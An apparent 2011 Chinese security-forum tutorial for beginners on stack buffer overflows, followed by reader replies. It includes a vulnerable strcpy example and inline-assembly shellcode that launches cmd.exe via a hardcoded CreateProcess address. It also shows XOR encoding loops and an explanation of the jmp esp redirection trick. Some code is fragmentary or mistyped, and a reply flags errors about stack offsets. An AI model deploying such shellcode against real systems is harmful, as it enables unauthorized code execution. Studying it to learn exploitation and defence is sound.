[原创]缓冲区溢出攻击浅析，写给初学者-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

[原创]缓冲区溢出攻击浅析，写给初学者

发表于: 2011-3-25 12:04 26453

[原创]缓冲区溢出攻击浅析，写给初学者

firfor

2011-3-25 12:04

26453

缓冲区溢出是一种非常普遍、非常危险的漏洞，在各种操作系统、应用软件中广泛存在。利用缓冲区溢出攻击，可以导致程序运行失败、系统当机、重新启动等后果。更为严重的是，可以利用它执行非授权指令，甚至可以取得系统特权，进而进行各种非法操作。缓冲区溢出攻击有多种英文名称：buffer overflow，buffer overrun，smash the stack，trash the stack，scribble the stack， mangle the stack， memory leak，overrun screw;它们指的都是同一种攻击手段。第一个缓冲区溢出攻击--Morris蠕虫，发生在十年前，它曾造成了全世界6000多台网络服务器瘫痪。

　　一、缓冲区溢出的原理

　　通过往程序的缓冲区写超出其长度的内容，造成缓冲区的溢出，从而破坏程序的堆栈，使程序转而执行其它指令，以达到攻击的目的。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序：

void function(char *str)
{
  char buffer[16];
　strcpy(buffer,str);
}

[COLOR="Magenta"]Int Add(int x ,int y)[/COLOR]
{
Push    ebp;
mov     ebp,esp
sub     esp,44h
push    ebx
push    esi
push    edi
Lea     edi,[ebp-44h]
mov     ecx,11h
mov     eax,0xcccccccc
rep     eax,0cccccccch
[COLOR="magenta"]Int sum;[/COLOR]
[COLOR="magenta"]sum=x+y;[/COLOR]
mov     eax,dword ptr [ebp+8]
add     eax,dword prt [ebp+12]
mov     dword ptr[ebp-4]，eax
[COLOR="magenta"]return sum;[/COLOR]
mov     eax,dword ptr [ebp-4]
}
pop     edi
pop     esi
pop     ebx
mov     esp,ebp
pop     ebp
ret

char *  retAddr;//global
int         gi;
void * getCode()
{
    char * codeStart, * codeEnd;
    int codeLen;
    void * code;
   _asm
   {
        mov codeStart, offset _startCode;
        mov codeEnd, offset _endCode;
   }
  codeLen = codeEnd - codeStart;
  code  = malloc(codeLen);
  memcpy(code, codeStart, codeLen);
  return code;
  //the following code never run.
_startCode:
    _asm    
        {       
         mov gi, 23;        
         jmp retAddr;   
        }
_endCode:   
  return;
}
void main()
{
  void * code;
  _asm mov retAddr, offset _retAddr;
  gi  = 12;
  printf("gi is %d\n", gi);
  code = getCode();
 
  _asm jmp code;
_retAddr:
  printf("gi is %d\n", gi);
  free(code);
}

_startCode:
 
    printf(“这是shell code 中的printf\n”);
    _asm{
        mov gi, 23;
        jmp retAddr;
    }
 
_endCode:

for(int i=0;i<codeLen;i++)
    {
        if (temp[i]==0xE8)
        {
            temp=temp+i+1;
            ttp=(unsigned int *)temp;
            printf("\tttp=0x%x\n",*ttp);
            if (code<codeStart)
            {
                tempValue=codeStart-code;
                *ttp+=tempValue;
            }else{
                tempValue=code-codeStart;
                *ttp-=tempValue;
            }
            break;
        }
    }

for (int j=0;j<codeLen;j++)
    {   
        printf("source_code[%d]=0x%x\t",j,code[j]);
        [COLOR="red"]code[j]^=0x90;[/COLOR]
        printf("code[%d]=0x%x\n",j,code[j]);
    }

for (int j=0;j<len;j++)
    {
         
        //printf("sourccode[%d]=0x%x\t",j,tp[j]);
        [COLOR="Red"]tp[j]^=0x90;[/COLOR]
        //printf("code[%d]=0x%x\n",j,tp[j]);
    }

for (temp=0;temp<len;temp++)
        {
            if (tp[temp]==0xe8)[COLOR="red"]//寻找E8，再改地址[/COLOR]
            {
                printf("E8在temp=%d\n",temp);
                unsigned int *intP=(unsigned int *)(tp+temp+1);
                printf("以前的偏移量为：*intP=0x%x\n",*intP);
                printf("以前的地址为：k=0x%x\n",k);
                printf("现在的地址为：tp=0x%x\n",tp);
                if (addrs2>addrs1)
                {
                    unsigned int addr=addrs2-addrs1;[COLOR="red"]//原来是k-tp[/COLOR]
                    *intP-=addr;
                }
                else{
                    unsigned int addr2=addrs1-addrs2;[COLOR="red"]//原来是tp-k[/COLOR]
                    *intP+=addr2;
                }
                printf("intP=0x%x\n",intP);
                printf("*intP=0x%x\n",*intP);
                break;
            }
        }

mov  ppp,0x7c800000+0x2367;//先存入绝对地址
[COLOR="Red"]mov  eax,ppp;[/COLOR]                                                                  //暂存到eax中
[COLOR="Magenta"]sub  eax,(offset lab1);[/COLOR]                                                            //与下一个标号的地址进行相减，得到相对地址
[COLOR="Red"]mov  ppp,eax;  [/COLOR]            //再存到ppp指针中
push 0;         //传入第一个参数null
push p3;            //传入第二个参数，这是一个批向一个”cmd.exe”字串的指针
push 0;             //这是第三个参数 null
push 0;         //第四个参数：null
push 1;         //第五个参数：TRUE
push  CREATE_DEFAULT_ERROR_MODE;//这里用的是一个掩码，windows定义的
push  0;        //null
push  0;        //null
push  p1;       //si指针：*LPSTARTUPINFO
push  p2;       // ppiP指针:PPROCESS_INFORMATION
call  ppp;
lab1:add esp,40;

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

_startCode:
    _asm
    {
[COLOR="Blue"]//=================10===================================
        /*            for
        ------PPROCESS_INFORMATION---------
        */
        call next3;/*5byte*/[/COLOR]
         
_proc_info:
        [COLOR="blue"]//1*4[/COLOR]
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//2*4[/COLOR]
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//3*4[/COLOR]
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//4*4[/COLOR]
        nop;
        nop;
        nop;
        nop;
 
next3:
        [COLOR="blue"]/*
        pop   eax;
        push  eax;
//相当于先弹到eax中，得到了第一个结构体的地址。再入栈就是最后一个参数的指针。
        */[/COLOR]
[COLOR="blue"]//==================9====================================
        /*           for
        ----------STARTUPINFO-------------
        */[/COLOR]
 
        call    next2[COLOR="blue"];/*5byte*/[/COLOR]
         
_start_info:
        [COLOR="blue"]//1*10[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//2*10[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//3*10[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//4*10[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;    
        [COLOR="blue"]//5*10[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//6*10[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        [COLOR="blue"]//6*10+8[/COLOR]
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;
        nop;    
 
next2:
        [COLOR="blue"]/*
        pop   eax;
        push  eax;
//相当于先弹到eax中，得到了第一个结构体的地址。再入栈就是倒数第二个参数的指针。
        */[/COLOR]
[COLOR="blue"]//==========8，7，6，5，4，3======================[/COLOR]
        push  0;
        push  0;
        push  CREATE_DEFAULT_ERROR_MODE;
        push 1;
        push 0;
        push 0;
[COLOR="blue"]//==============push cmd.exe=====2======================[/COLOR]
        call next1;
_cmd:   nop;//’c’
        nop;//’m’
        nop;//’d’
        nop;//’.’
        Nop;//’e’
        nop;//’x’
        nop;//’e’
        nop;//’\0’
next1:  pop eax;
        push eax;
[B][COLOR="Red"]/*
        本来想在这里直接改成我们想要的cmd.exe可是会出现访问违规的操作
。默认的代码段是不可以写的       
        mov [eax],'c';
        mov [eax+1],'m';
        mov [eax+2],'d';
        mov [eax+3],'.';
        mov [eax+4],'e';
        mov [eax+5],'x';
        mov [eax+6],'e';
*/[/COLOR][/B]
[COLOR="Blue"]//-=========-push 参数1==========1===================[/COLOR]
        push 0;
        mov  eax,0x7c800000+0x2367;
        call  eax;
        jmp retAddr;
    }
_endCode: 

一般来说要直接跳到我们的代码在的地方是不可能的。在windows上，不幸的是这个栈起始地址很低，0x00130000，所以无法保证没有00字节出现这个要求，而且多线程的特性，有使得这个值变化不定，更不可能事先计算出来。所以在windows中有了一个更加巧妙的办法。在程序中去找一个条指令叫：jmp esp的指令。若找到这么一条指令我们就可以把函数的返回地址写为这一第指令所在的地方。这样在执行完jmp esp的时候我们的程序就会又回到栈上来执行。而此时的执行地方刚好是retAddress的高一个单位（4字节）的地方处。只要我们在这里放上我们的代码就可以开始执行了。

有一个调试器叫ollyDbg，有一个插件叫ollyUni，就有查找的功能。
通过自己编写内存查找器可以很容易的实现指令的查找。

登录后可查看完整内容

[招生]科锐逆向工程师培训(2025年3月11日实地，远程教学同时开班, 第52期)！

上传的附件：

QQ截图未命名.JPG （25.02kb，1812次下载）
CLASS FUNCTION1.PNG （29.05kb，1806次下载）
jmp esp.png （58.20kb，1786次下载）
default.png （3.01kb，1770次下载）
testexe.JPG （8.43kb，1771次下载）
call.JPG （14.96kb，1766次下载）
startcode.JPG （14.11kb，1761次下载）
gi2.JPG （12.09kb，1765次下载）
overflowself.JPG （44.52kb，1760次下载）
fun.JPG （17.30kb，1745次下载）
fun2.JPG （19.69kb，1739次下载）
2.JPG （10.93kb，1740次下载）
3.JPG （16.95kb，1736次下载）
gi3.JPG （19.71kb，1729次下载）
5.JPG （25.67kb，1727次下载）
6.JPG （7.29kb，1692次下载）
7.JPG （6.98kb，1689次下载）
2008.JPG （23.68kb，1684次下载）
dump.JPG （24.54kb，1686次下载）
processAddress.JPG （52.01kb，1677次下载）
b4.JPG （5.28kb，1676次下载）
code.JPG （25.96kb，1668次下载）
demo.JPG （16.98kb，1675次下载）
demo2.JPG （14.86kb，1667次下载）
演示.jpg （27.97kb，1671次下载）
演示2.jpg （60.45kb，1666次下载）
相关程序.rar （81.57kb，98次下载）
相关.jpg （63.29kb，1667次下载）
jmp_esp相关.rar （364.52kb，90次下载）
源代码.rar （69.83kb，121次下载）

收藏・78

免费・7

支持

赞赏记录

参与人

雪币

留言

时间

Youlor

为你点赞~

2024-5-31 06:19

伟叔叔

为你点赞~

2024-3-25 01:47

心游尘世外

为你点赞~

2024-2-7 00:45

飘零丶

为你点赞~

2024-1-28 00:13

QinBeast

为你点赞~

2024-1-23 04:50

shinratensei

为你点赞~

2024-1-19 00:07

PLEBFE

为你点赞~

2023-3-10 03:57

最新回复 (129) 1 2 3 4 5 6 ▶
hbwazxf 雪币： 152 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 121 粉丝 0 关注私信	hbwazxf 2 楼新手学习一下。。。 2011-3-25 12:50 0
我是黑马雪币： 365 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 119 粉丝 0 关注私信	我是黑马 3 楼写的真是太好了！ 2011-3-25 15:28 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 4 楼呵呵，只是随便写写，不是啥高深的东西！见笑了 2011-3-25 17:11 0
雪之苏雪币： 232 活跃值： (105) 能力值： ( LV8，RANK：120 ) 在线值：发帖 11 回帖 118 粉丝 1 关注私信	雪之苏 2 5 楼好长啊。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 2011-3-25 17:30 0
ttgood 雪币： 386 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 218 粉丝 0 关注私信	ttgood 6 楼好啊。。。。。。。 2011-3-25 20:08 0
FiveCent 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	FiveCent 7 楼写得不错，不过这是最基本的吧 2011-3-25 23:58 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 8 楼不是基础就不是给初学的人啦 2011-3-26 10:19 0
comewisdom 雪币： 473 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 130 粉丝 0 关注私信	comewisdom 9 楼路过路过,学习学习学习.......... 2011-3-26 10:23 0
邪香雪币： 33 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	邪香 10 楼讲得挺好的。很详细啊。可惜没KX，下不了 2011-3-26 10:38 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 11 楼天天在线几个小时就有了。 2011-3-26 11:18 0
FiveCent 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	FiveCent 12 楼希望还有后续的内容 2011-3-26 11:35 0
riusksk 雪币： 433 活跃值： (1885) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 268 关注私信	riusksk 41 13 楼不错的入门文章，排版不错！ 2011-3-26 13:51 0
nasta 雪币： 9 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	nasta 14 楼新人围观、、、 2011-3-26 13:56 0
飞鸿雪币： 74 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 103 粉丝 0 关注私信	飞鸿 15 楼 LZ一步步的很详细，排版也很好，谢谢了。 2011-3-26 18:37 0
齐风雪币： 33 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 61 粉丝 1 关注私信	齐风 16 楼谢谢楼主的耐心讲解， 2011-3-26 18:45 0
huangwen 雪币： 411 活跃值： (376) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 56 粉丝 1 关注私信	huangwen 17 楼收藏后细看，谢了 2011-3-26 18:55 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 18 楼以后看啦。有机会还会写些的。 2011-3-27 16:41 0
powerzone 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	powerzone 19 楼讲解的非常详细~ 2011-3-27 16:51 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 20 楼谢谢鼓励，只为大家入门 2011-3-27 17:47 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 21 楼不过好像没有人看啊。好像大家不做这一个方向 2011-3-28 23:05 0
tornodo 雪币： 437 活跃值： (130) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 22 楼看看。 2011-3-29 07:57 0
tornodo 雪币： 437 活跃值： (130) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 23 楼真怀疑你是不是抄来的，怕你这里有错。你再仔细看看代码，ebp+的是形参，ebp-的是局部变量。 2011-3-29 09:25 0
tornodo 雪币： 437 活跃值： (130) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 24 楼还有你那个图，我怎么记得高地址在下面呢？ 2011-3-29 09:27 0
chenyiao 雪币： 207 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	chenyiao 25 楼辛苦辛苦。好人。 2011-3-29 15:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

firfor

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (129) 1 2 3 4 5 6 ▶
hbwazxf 雪币： 152 活跃值： (20) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 121 粉丝 0 关注私信	hbwazxf 2 楼新手学习一下。。。 2011-3-25 12:50 0
我是黑马雪币： 365 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 119 粉丝 0 关注私信	我是黑马 3 楼写的真是太好了！ 2011-3-25 15:28 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 4 楼呵呵，只是随便写写，不是啥高深的东西！见笑了 2011-3-25 17:11 0
雪之苏雪币： 232 活跃值： (105) 能力值： ( LV8，RANK：120 ) 在线值：发帖 11 回帖 118 粉丝 1 关注私信	雪之苏 2 5 楼好长啊。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。 2011-3-25 17:30 0
ttgood 雪币： 386 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 2 回帖 218 粉丝 0 关注私信	ttgood 6 楼好啊。。。。。。。 2011-3-25 20:08 0
FiveCent 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	FiveCent 7 楼写得不错，不过这是最基本的吧 2011-3-25 23:58 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 8 楼不是基础就不是给初学的人啦 2011-3-26 10:19 0
comewisdom 雪币： 473 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 130 粉丝 0 关注私信	comewisdom 9 楼路过路过,学习学习学习.......... 2011-3-26 10:23 0
邪香雪币： 33 活跃值： (11) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 3 粉丝 0 关注私信	邪香 10 楼讲得挺好的。很详细啊。可惜没KX，下不了 2011-3-26 10:38 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 11 楼天天在线几个小时就有了。 2011-3-26 11:18 0
FiveCent 雪币： 0 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	FiveCent 12 楼希望还有后续的内容 2011-3-26 11:35 0
riusksk 雪币： 433 活跃值： (1885) 能力值： ( LV17，RANK：1820 ) 在线值：发帖 169 回帖 2648 粉丝 268 关注私信	riusksk 41 13 楼不错的入门文章，排版不错！ 2011-3-26 13:51 0
nasta 雪币： 9 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 16 粉丝 0 关注私信	nasta 14 楼新人围观、、、 2011-3-26 13:56 0
飞鸿雪币： 74 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 103 粉丝 0 关注私信	飞鸿 15 楼 LZ一步步的很详细，排版也很好，谢谢了。 2011-3-26 18:37 0
齐风雪币： 33 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 61 粉丝 1 关注私信	齐风 16 楼谢谢楼主的耐心讲解， 2011-3-26 18:45 0
huangwen 雪币： 411 活跃值： (376) 能力值： ( LV2，RANK：10 ) 在线值：发帖 3 回帖 56 粉丝 1 关注私信	huangwen 17 楼收藏后细看，谢了 2011-3-26 18:55 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 18 楼以后看啦。有机会还会写些的。 2011-3-27 16:41 0
powerzone 雪币： 200 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	powerzone 19 楼讲解的非常详细~ 2011-3-27 16:51 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 20 楼谢谢鼓励，只为大家入门 2011-3-27 17:47 0
firfor 雪币： 122 活跃值： (46) 能力值： ( LV5，RANK：60 ) 在线值：发帖 13 回帖 73 粉丝 0 关注私信	firfor 1 21 楼不过好像没有人看啊。好像大家不做这一个方向 2011-3-28 23:05 0
tornodo 雪币： 437 活跃值： (130) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 22 楼看看。 2011-3-29 07:57 0
tornodo 雪币： 437 活跃值： (130) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 23 楼真怀疑你是不是抄来的，怕你这里有错。你再仔细看看代码，ebp+的是形参，ebp-的是局部变量。 2011-3-29 09:25 0
tornodo 雪币： 437 活跃值： (130) 能力值： ( LV5，RANK：70 ) 在线值：发帖 7 回帖 232 粉丝 0 关注私信	tornodo 1 24 楼还有你那个图，我怎么记得高地址在下面呢？ 2011-3-29 09:27 0
chenyiao 雪币： 207 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 5 粉丝 0 关注私信	chenyiao 25 楼辛苦辛苦。好人。 2011-3-29 15:44 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[原创]缓冲区溢出攻击浅析，写给初学者

账号登录 验证码登录

账号登录

验证码登录